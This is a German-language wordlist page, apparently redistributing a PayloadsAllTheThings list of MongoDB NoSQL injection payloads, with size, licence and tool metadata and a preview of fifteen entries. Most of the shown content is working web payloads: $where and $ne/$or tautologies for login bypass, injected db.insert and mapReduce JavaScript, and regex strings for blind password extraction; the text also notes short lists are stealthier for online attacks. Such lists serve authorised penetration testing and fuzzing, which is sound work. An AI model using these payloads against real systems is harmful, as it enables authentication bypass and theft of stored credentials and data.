MongoDB NoSQL Injection (PayloadsAllTheThings)
MongoDB-spezifische NoSQL-Injection-Payloads mit den Operatoren $where, $ne, $or und JavaScript-Auswertung, zur Authentifizierungsumgehung und blinden Datenextraktion.
- Größe
- 560 B
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- burpwfuzznuclei
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (560 B) herunter oder kopiere sie über die Schaltflächen oben.
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00MongoDB-spezifische NoSQL-Injection-Payloads mit den Operatoren $where, $ne, $or und JavaScript-Auswertung, zur Authentifizierungsumgehung und blinden Datenextraktion.
Diese Liste ist auf Input-Fuzzing und Schwachstellen-Discovery ausgerichtet. Sie umfasst etwa 560 B und harmoniert gut mit Tools wie burp, wfuzz, nuclei. Wähle die kleinste Liste, die zu deinem Einsatz passt: Kürzere Listen sind schneller und unauffälliger für Online- Angriffe, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger ins Gewicht fällt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in die
Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer ursprünglichen Quelle auf GitHub bereitgestellt.
Bezogen von swisskyrepo/PayloadsAllTheThings und vertrieben unter MIT. Verwende Wortlisten ausschließlich gegen Systeme, für deren Test du ausdrücklich autorisiert bist.